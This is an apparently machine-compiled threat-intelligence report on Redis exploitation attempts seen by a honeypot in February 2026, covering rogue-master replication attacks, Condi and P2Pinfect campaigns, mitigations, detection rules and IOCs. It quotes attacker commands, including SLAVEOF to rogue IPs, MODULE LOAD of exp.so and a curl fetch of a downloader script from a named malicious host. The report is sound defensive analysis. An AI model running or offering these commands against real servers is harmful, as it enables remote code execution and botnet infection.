Redis lure on 6379 catching database attackers.

# Redis Database Exploit Attempts - NadSec - 2026-02

**Key Points:**
*   **High-Volume Targeting of Redis Services:** In February 2026, the NadSec Redis Honeypot in Sydney recorded 18,838 attack events from 759 unique IP addresses. The activity was dominated by attempts to exploit Redis's replication features (`SLAVEOF`/`REPLICAOF`) to achieve Remote Code Execution (RCE).
*   **Prevalence of "Rogue Server" Technique:** A significant portion of the attacks utilized the "Redis Rogue Server" technique. Attackers commanded the honeypot to synchronize with malicious master servers (e.g., `178.62.63.125`, `8.222.174.150`) to transfer and load malicious shared object modules (`exp.so`), bypassing authentication mechanisms to execute arbitrary system commands.
*   **Condi and Mirai Botnet Campaigns:** Analysis of payloads such as `jack5tr.sh` and `j.sh` strongly links this activity to the **Condi** botnet, a Mirai variant known for exploiting unpatched routers and IoT devices. The infrastructure mapping reveals a reliance on compromised cloud hosts and specific bulletproof or abused hosting providers (e.g., DigitalOcean, Alibaba Cloud, and specific residential/hosting proxies) for payload delivery.
*   **Infrastructure Abuse:** Top attacking ASNs included **Amazon.com, Inc.**, **China Telecom Group**, and **Alsycon B.V.**, suggesting a mix of compromised legitimate cloud infrastructure and potentially dedicated attack servers. Notably, activity from **PebbleHost** (a game server provider) indicates the likely compromise of gaming VPS instances for scanning purposes.

## 1. Executive Summary

This threat intelligence report details a sustained campaign of exploit attempts targeting Redis database servers during February 2026. Data collected from the NadSec T-Pot honeypot infrastructure in Sydney, Australia, reveals a highly automated and aggressive effort to compromise exposed Redis instances on TCP port 6379.

The primary attack vector observed was the abuse of Redis replication functionality. Threat actors attempted to force the honeypot to act as a "slave" or "replica" to a rogue master server controlled by the attacker. This mechanism allows the attacker to push a malicious compiled module (often named `exp.so`) to the victim server. Once loaded via the `MODULE LOAD` command, this module provides the attacker with the ability to execute shell commands on the host system, effectively bypassing the Redis sandbox.

Payload analysis confirms the presence of the **Condi** botnet (identified via the `jack5tr.sh` script) and likely **P2Pinfect** or similar worm-like variants that utilize Redis for propagation. The campaigns are characterized by the retrieval of ELF binaries targeting multiple architectures (ARM, x86, MIPS), indicating a broad targeting of both Linux servers and IoT devices. Geographically, the attacks originated predominantly from the United States and China, with significant support infrastructure located in the Netherlands and Singapore.

## 2. Statistical Overview

The following data characterizes the threat landscape observed by the NadSec Redis Honeypot in February 2026.

**Table 1: Global Attack Statistics**

| Metric | Count |
| :--- | :--- |
| **Total Attacks** | 18,838 |
| **Unique Attacker IPs** | 759 |
| **Targeted Port** | 6379 (Redis) |
| **Attack Type** | Scanning, Bruteforce, Exploitation (Rogue Server) |

**Table 2: Top 5 Attacker Countries**

| Country | Event Count | % of Total | Context |
| :--- | :--- | :--- | :--- |
| **United States** | 8,611 | 45.7% | High volume of compromised cloud assets (DigitalOcean, AWS). |
| **China** | 4,791 | 25.4% | Combination of scanning infrastructure and C2 nodes (Alibaba). |
| **Netherlands** | 1,607 | 8.5% | Significant hosting of C2 and scanning servers (Alsycon B.V.). |
| **Singapore** | 794 | 4.2% | Hosting abuse (Datacamp Limited). |
| **Russia** | 638 | 3.4% | Bruteforce and scanning activity. |

**Table 3: Top 5 Attacking ASNs**

| ASN | Organization | Event Count | Classification |
| :--- | :--- | :--- | :--- |
| **AS16509** | Amazon.com, Inc. | 2,645 | Cloud Service Provider (Compromised Tenants) |
| **AS4134** | China Telecom Group | 2,049 | ISP / Backbone |
| **AS49870** | Alsycon B.V. | 2,039 | Hosting / Data Center |
| **AS8075** | Microsoft Corporation | 1,315 | Cloud Service Provider (Azure Abuse) |
| **AS14061** | DigitalOcean, LLC | 1,239 | Cloud Service Provider (Droplet Abuse) |

## 3. Infrastructure Deep Dive & IP Attribution

Analysis of the top attacking IP addresses reveals distinct clusters of activity ranging from compromised cloud infrastructure to dedicated command and control (C2) servers.

### 3.1. Rogue Master Servers (The "SlaveOf" Technique)
The most critical infrastructure identified in this campaign are the IPs designated as "masters" in the `SLAVEOF` or `REPLICAOF` commands. These servers are configured to serve the malicious `exp.so` module to the honeypot.

*   **178.62.63.125 (DigitalOcean, GB)**
    *   **Role:** Rogue Master / Payload Server.
    *   **Observed Behavior:** Targeted by attacker IP `51.254.196.211` (OVH, FR) via the command `SLAVEOF 178.62.63.125 60147`.
    *   **Attribution:** Threat intelligence sources link this IP to the distribution of P2Pinfect and Mirai-variant malware. It has historically hosted malicious binaries accessible via high ports (e.g., port 60147) serving ELF binaries [cite: 1, 2].
    *   **Context:** The usage of high ports for serving the rogue module is a common evasion technique to bypass simple web scanning.

*   **8.222.174.150 (Alibaba US Technology Co., Ltd., US)**
    *   **Role:** Rogue Master.
    *   **Observed Behavior:** Targeted by attacker IP `196.190.220.129` (Ethio Telecom, ET) via `SLAVEOF 8.222.174.150 60111`.
    *   **Attribution:** Hosted on Alibaba Cloud infrastructure in the US [cite: 3, 4]. The interaction pattern confirms this host is configured to synchronize malicious data to victims.

*   **160.30.159.104 (SWAN, a.s., SK)**
    *   **Role:** Primary Payload Delivery Server.
    *   **Observed Behavior:** The attacker IP `103.253.21.199` (VN) attempted to execute a script downloaded from this host: `curl -sL http://160.30.159.104/j.sh`.
    *   **Attribution:** This IP is a known distribution point for the **Condi** botnet (a Mirai variant). It hosts scripts like `jack5tr.sh` and binaries for various architectures (`x86_64`, `arm7`) [cite: 5, 6].
    *   **Reputation:** Classified as a high-confidence threat indicator by multiple threat feeds [cite: 7, 8].

### 3.2. Scanning and Exploitation Source Clusters
A large volume of "scanner" IPs were observed initiating the attacks. These are often compromised devices or cheap VPS instances used to proxy attacks.

*   **14.103.78.216 (China Telecom, CN)**
    *   **Activity:** 818 events. This IP was the single most active source in the dataset.
    *   **Behavior:** It executed `SLAVEOF` commands pointing to multiple distinct rogue masters (`8.219.221.124`, `47.237.133.220`, `47.236.26.200`), indicating it functions as a central scanning node for a larger botnet infrastructure.
*   **PebbleHost IPs (e.g., 85.11.182.23, 85.11.182.27)**
    *   **ASN:** AS212027 (PebbleHost Ltd).
    *   **Context:** PebbleHost is a provider known for hosting game servers (Minecraft) [cite: 9]. The high volume of bruteforce scanning from these IPs suggests that customer containers or game servers have been compromised and repurposed for scanning, or that the provider's low-cost tier is being abused by threat actors for anonymity [cite: 10].
*   **DigitalOcean & Amazon AWS Cluster**
    *   **ASNs:** 14061, 16509.
    *   **Analysis:** Thousands of events originated from these ASNs. This represents "Cloud Abuse"—legitimate cloud accounts compromised by attackers or created with stolen credit cards to provide ephemeral scanning infrastructure. The high churn rate of these IPs makes static blocklisting difficult.

## 4. Malware Analysis

The campaign relies on a multi-stage infection process involving shell scripts, compiled Redis modules, and ELF binaries.

### 4.1. The "Rogue Server" Module: `exp.so`
*   **Delivery Mechanism:** This file is not downloaded via HTTP/FTP but is transferred over the Redis replication protocol. The attacker sets the victim's `dbfilename` to `exp.so` and initiates synchronization with the rogue master. The master sends the shared object file as the "database dump."
*   **Functionality:** Once loaded using `MODULE LOAD ./exp.so`, the module registers new commands (commonly `system.exec`) that allow the attacker to pass arbitrary shell commands to the underlying OS [cite: 11, 12].
*   **Attribution:** This technique is extensively documented in association with **P2Pinfect**, **H2Miner**, and generic Redis exploits derived from the `redis-rogue-server` proof-of-concept [cite: 11, 13, 14].

### 4.2. Downloader Script: `jack5tr.sh` / `j.sh`
*   **Source:** `http://160.30.159.104/j.sh` (or `jack5tr.sh`).
*   **Family Attribution:** **Condi** (Mirai Variant).
*   **Behavioral Analysis:**
    *   **Process Killing:** The script actively searches for and terminates competing botnet processes (e.g., other crypto-miners or Mirai variants) to secure exclusive resource access.
    *   **Architecture Agnostic:** It downloads ELF binaries for a wide range of CPU architectures (MIPS, ARM, x86, etc.) to ensure successful infection regardless of the host hardware [cite: 15, 16].
    *   **Persistence:** It attempts to modify crontabs and system services to ensure the malware survives reboots.
    *   **Payload:** The script executes the downloaded ELF binary, which connects to a separate C2 server for DDoS instructions or cryptomining tasks. Sandbox reports confirm detection of **Mirai** and **Condi** signatures [cite: 17, 18, 19].

### 4.3. P2Pinfect Indicators
*   **Behavior:** The heavy reliance on the replication feature (`SLAVEOF`) combined with high-port rogue servers (e.g., port 60147) is a specific TTP (Tactic, Technique, and Procedure) of the **P2Pinfect** worm. Unlike traditional botnets that use a central C2, P2Pinfect operates a peer-to-peer network, making takedowns significantly harder [cite: 13].

## 5. Campaign Attribution

Based on the IOCs and TTPs observed in the February 2026 dataset, two primary campaigns are active:

1.  **Condi Botnet Campaign:**
    *   **Evidence:** Direct reference to `jack5tr.sh` and `160.30.159.104`.
    *   **Goal:** Recruitment of IoT devices and Linux servers into a DDoS botnet. Condi is essentially a "botnet-as-a-service" often sold on Telegram, capable of launching various flood attacks (TCP SYN, UDP, HTTP) [cite: 15, 16].
    *   **Targeting:** Opportunistic scanning of unpatched services, specifically targeting vulnerabilities like CVE-2023-1389 and misconfigured Redis servers [cite: 15, 16].

2.  **P2Pinfect / Redis Worm Campaign:**
    *   **Evidence:** Use of the `SLAVEOF` command with high-port destinations and the `exp.so` module filename.
    *   **Goal:** Creation of a resilient, decentralized botnet. While often associated with cryptomining, P2Pinfect's robust P2P architecture allows for modular payload updates.
    *   **Targeting:** Specifically targets exposed Redis and MySQL instances.

## 6. Detection & Mitigation

To defend against these threats, organizations must implement defense-in-depth strategies specifically tailored to Redis environments.

### 6.1. Network & Host Mitigation
*   **Firewall Rules:** Block port 6379 (Redis) from the public internet. Redis should strictly be bound to `localhost` or a private interface. Use VPNs or SSH tunnels for remote access.
*   **Rename Dangerous Commands:** In `redis.conf`, rename critical commands to empty strings to disable them:
    ```text
    rename-command MODULE ""
    rename-command SLAVEOF ""
    rename-command REPLICAOF ""
    rename-command CONFIG ""
    ```
*   **Authentication:** Require strong authentication (ACLs) for all Redis connections.

### 6.2. SIEM & Detection Queries
**Splunk / SIEM Query for Rogue Server Activity:**
```splunk
index=honeypot_data sourcetype=redis_logs
| search command IN ("SLAVEOF", "REPLICAOF", "MODULE LOAD")
| rex field=_raw "SLAVEOF (?<rogue_ip>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}) (?<rogue_port>\d+)"
| stats count by src_ip, rogue_ip, rogue_port
```

**Suricata Signature for `exp.so` Transfer:**
```suricata
alert tcp any any -> $HOME_NET 6379 (msg:"ET EXPLOIT Redis Remote Code Execution via Rogue Server (exp.so)"; flow:established,to_server; content:"exp.so"; nocase; content:"MODULE LOAD"; distance:0; classtype:attempted-admin; sid:1000001; rev:1;)
```

**Suricata Signature for `jack5tr` Download:**
```suricata
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Condi/Mirai Downloader (jack5tr.sh)"; flow:established,to_server; http.uri; content:"jack5tr.sh"; fast_pattern; reference:url,urlhaus.abuse.ch/url/3786982/; classtype:trojan-activity; sid:1000002; rev:1;)
```

## 7. IOC Appendix

### Top 10 Attacker IPs (Scanners/Proxies)
*   `14.103.78.216` (CN, China Telecom) - High volume scanner linked to multiple rogue masters.
*   `156.146.57.178` (SG, Datacamp) - Bruteforce source.
*   `51.254.196.211` (FR, OVH) - Initiator of P2Pinfect exploitation.
*   `3.134.148.59` (US, Amazon) - Bruteforce source.
*   `3.130.168.2` (US, Amazon) - Bruteforce source.
*   `18.191.106.209` (US, Amazon) - Bruteforce source.
*   `3.135.20.78` (US, Amazon) - Bruteforce source.
*   `167.99.155.172` (US, DigitalOcean) - Bruteforce source.
*   `65.49.1.222` (US, Hurricane Electric) - Bruteforce source.
*   `223.76.108.98` (CN, China Mobile) - Bruteforce source.

### Rogue Master Servers (C2 / Malicious Module Hosts)
*   `178.62.63.125` (GB, DigitalOcean) - **CRITICAL**: P2Pinfect/Mirai rogue master.
*   `160.30.159.104` (SK, SWAN) - **CRITICAL**: Condi payload delivery (`jack5tr.sh`).
*   `8.222.174.150` (US, Alibaba) - Rogue master.
*   `47.237.133.220` (US, Alibaba) - Rogue master.
*   `8.219.221.124` (SG, Alibaba) - Rogue master.

### Malicious Filenames & Commands
*   `jack5tr.sh`, `j.sh` (Condi Downloader)
*   `exp.so` (Redis RCE Module)
*   `system.exec` (Command execution function within malicious module)
*   `SLAVEOF NO ONE` (Command to detach from rogue master after infection)

## 8. Sources & Citations
[cite: 1, 2, 20] URLhaus Database for 178.62.63.125.
[cite: 13, 21] SOCRadar & Fortinet Research on P2Pinfect and Condi/Mirai.
[cite: 15, 16] Fortinet & Wolfpack Cybernetics Analysis of Condi/Jack5tr.
[cite: 11, 12, 14] KnownSec 404 & Github on Redis Rogue Server Exploits.
[cite: 5, 6] URLhaus Tags and Recent Payloads for `sh` and `jack5tr`.
[cite: 17, 18, 19] ANY.RUN and FileScan.IO Sandbox Reports for `jack5tr.sh`.
[cite: 9, 10] PebbleHost and BGP Tools infrastructure context.
[cite: 3, 4] IPInfo ASN data for Alibaba and DigitalOcean IPs.

**Sources:**
1. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG0LuE-K32YolRqzXIAKB4ue66YOCET2E0nA7LLzRlQwUdH403Oh8MJxgVCsiC7pwGnmyTJFE_ASSc-gh3wRZnZSybwXPa7EeYXMhBub6Js3baUvl1Gi6zkEA==)
2. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFXwBL6QLpkkFx63FJhnDscph_5wRvRSDj3mWIxEwLRqQ5bqYOgIGPX0b1wHxQitw6PYWO1dWQCAY0OdmDxz3IZimMWWiG35ucNkcC1PNMpLmSXK9nJevmTJ9cSQBm4ig==)
3. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFhoG2ejgoGlckhgkuGG2SwM2vJ4PJaL5PL-_olug2OAMMWZw2DgHNWHhuOJdbpoWjZs4bVAxT75wSHcBLms4Cem02wTcCI_QFAagfGbg6ocXK68w==)
4. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEDtpYVCj1QBRak2yvOiEbJAogsG9EtRqkz9AJhAdR975elSAOI7XoP8QU6LjMICEz6DPxArmkwLFsWd7xforEhpdsQ0NIKVUC79qKtklUdw6-lrdjcY6jwo0g=)
5. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHGTFafgdeRE1wram_4HEWfRzuRjV2ZenDXHcRJ0EHg7jb61CYXiEjHlExJ3IHur405rQoFRHB0Qd3CZzfKpbOF0gpFkS0g2tbC7CV_-AXiomMe9kZhA0TZX2QEkx4=)
6. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF3rB2Teqfd_03kyD2-sQ62pxD1VjqrMV6ojiWlKDh99Vmia6x3Rxc1kAz0vl7CGKVrmWZqaad3vQd6wjgkoCVzplPBDSvRQePXRZlSi2DRUgBmva8n8Ko3XzdzArPlgCDQ9dDs)
7. [githubusercontent.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFkPdxwL_5UV0hEmwRqSwHlFgBBufg_yOroDdH_rW5ux2CEFxvodZ-1K8C1b7jXlAARnZbe2kFl0GwkE795vL85bxNEMAZTEeDIV5hzbjExsAsr31CnYzybsLgEpJLCzXO2l0DK0MHb8XayTVomc9xcmnAh5G0tr2wo6XHXkcri8W-A-g==)
8. [githubusercontent.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH2zf5wGqU6NTlbtcMMCpWM-jO9rzOlVhyqkkI30QkXYCHu3_jIi89Nm0mEA1d5WPxOktf9UpwyPm6b0bus5tIO4-19ehFqYp9XBwWiP0z_HS9_SRFcb-ve7LZ1L-Z6wWs6jQRAt-70kOKI8eEsa8J-zoNKK8lCWF-ji-oaXhT5slix4uM41RXERv6QR5BCZ5Nfc5UQ4qv9QEHVuao=)
9. [sourceforge.net](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGYn7wiWi0Agy3ZJHgsWUf82NjhBgrMnNJh8b-K9AZDq3BqMMQNTRdDr8cB7ONyFWHT7uVGF_5GE8s7DIHPLND4kdY4Cp11qv8-enSLXsrWQUF0TB1HxORLXZy-cJpKWwkmcIogC8iHkbxU2EJY3mpUX6wl_W4=)
10. [bgp.tools](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEEemFF9pM33WaK1ftCUCSRJG4tO2qxJb6G_h3DeRgUSMTaon4b-TMNIZq5AtuPHqk3qGkRSKWw7aPbJPCXWGy1cKu0-7vzhMwqH4ely9PiH9c2LxJ8zo2pq_ekEX1p)
11. [medium.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGTfVG9FB85rsft_J1yULONxJYTSwt0QdI8IKgLy6SRtOOHObzlCpUxtUn02Wxxiv8HAzRrkWpX1nWaXt02kWyGocKoT_b9Vm3byHXzMmm2bC0O_S4y8Mj3pL7eD8oStoiy-XzX8W7Dr0XU4-H6CenOyhFx1bIfUS-OxgDTIDJA3c_epkLDw-rDtaZxH_iIqI7YGUJbiuDK2LF8bIjpKw==)
12. [synacktiv.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGJd9DjLp1KdQTiBiQ8PCZM0mhRqKF7FUoNcU7Cwed8Xbxj-wfday69yjezyGNdsPn-rPBvYCW2-NdSA-J0USC2scEHHER4BmxeTxDi3P7YE44f2-ZI1F7PltUitAfXIzBFtEy0PusyehVN0MpMH-ytqIFnvI7WiqQGSWfAKNIEWpx8eNhZe_YRzUKsA1NGT-MxwoR41AW66ybOfacwWACPP6vzH4AtohHfMZ4=)
13. [socradar.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGd3iSWVehACMtG1NdscSl-r8t1HA7YRv4qoNCgPzGzYDrQIPl0-L5HYnbVFJZri5WMHIcRWWZXD30dp-Gy-obrfetifCl5Rrz_tObWT_r6psgcDdHbUjND9fwwOyqRwccN0bcUWa3DZRO8M2dM4iq3Vf5J4Ekm-hgRy6asxw5Csu_iutaieaqKgmrTWcjdETA=)
14. [github.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEHM_ZbJ94RPO_QcU-do9vM4tPb9anDhFD4cqq450KYocIvIJdGg6M0AE-Xs4eCBz7O8CqEb7xk3Ogmat9L8Bah0bKmTIBEPO4a3CQ_Orzm_FLZ54QRbfDJhw==)
15. [fortinet.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH5-A4KvYnWzLBTmpcyLEpn_SGFXD3fbOMxQt71cswr1DiVz0tvZrR_nKgBohAfyu-exBqSHLftOpQlQ_WeJDV3khAeMHCgjU0M12P68M-jyf3l8XXx8leIFolL2zIM5ZOt4GlKlZhwVoNR8d0oxhW0ZRKXag98V3gOvFkUJGdN8_YWKD4DuBVUAA7zsTjR_uVQQRDu1FWL7xl_WS-OFVMDsLpL)
16. [wolfpackcybernetics.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGsiQVrSb_aalEl3CaExy4WAR5ZqBK8QiCRAI0fXAezim33Le9bk_aoTjuHLCjkByMp6uXCZsL67QOgn5fDxaf-AyD3TyJ9xm3Ao2TDFh3hrSGZzEJepVcEkk8cIq_1PDUIf0ppu0frItWkHj8S)
17. [any.run](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFdnIL2nE4ouC3a49sTlyf2Nel38JrahZdDiKKMmfvi5KT_JVgOsW1jftnhvrc5qpHMUJGLOeVKM9nFZ9gvUqfC7VQD32oPQPANkzdRK9oDClAvb-feyMCtcgnP-aUc2yN-docMB4j98gyXWG0Wl3BpVCd1vyIwTI6dxAUVSRp6mCDKz5frN0UN6MBjKJ1DZgpW5NZjH9dOsLKuTb6qyphJvdzADv9TWgR5idaq6aDBU7dz)
18. [any.run](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHIS36qjXn27DCN4bUry01zJy-nZ-R5Ym06j7Us_bGG1Hvbc_6sz_JJxtAflv0_xt_42KOJwbJpMD_5fuU-rKxFj2Fv5nCURq3b2kvjDht_YJD8b3m8517BZ2yMZOi9Xw-JR0kDKK3IqBuFjYPTARm0-LWmjli8RkxZ5HWicRaQpJBd2EtNpv1jBVrh86k0iN9M1kMwaZkUImpD05G66lrPny4Q6ky1uuTFGb6oCw792TZS)
19. [filescan.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFvDLXGg0sA5c_vbZN-tggskVbGGiayjWW0r6nvNXZTn_yYcHdEsad0_S0rG1g_xfeuak9AN58CsvySX9FDMpSz5-10cHhlwdSOf-dMq7OEBV7A3LJqiJdE8wxaKQusfmgiAp57wL4KOgPXw5NHjjUPVLkDGk57NJgZiI1TLd0VNaOqPl5rdIY5v0U-_L-xlhS4RMd68VlT-6DOQy1BaJLk-eyF9w==)
20. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHRBy-xoMFVI1JMjMGgjVHZIRYIiWyLVZ3iitmUnu_7t3zl3CihTlbYFS3ivwcWWmsCb_2fRoMi8f1LUCD8AXBphm5-3ESpKUhzXjc9cozkIWi70-v7j8FU5P_sBq8x)
21. [fortinet.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEkkwJnPlv3rjhFkLsACwRsTV1wIMhXkkK-aphMGS7kp3P_razPzXboXeqCJ7pDdDTDrc7Kzg42ox9qmLQLuhU-bQLj159ErnUFLDIWJqxOfmXrgD1Q1NCraMqukvE_3h9PgSzwefQD3PrE6M23Ah3qQmztDgEQny_7OJguJ2Lpoze1q4GFyDRgdXo5jX4UGlXJ5AnnQUtuxPMgYBBIXPiQGuQg9CK7)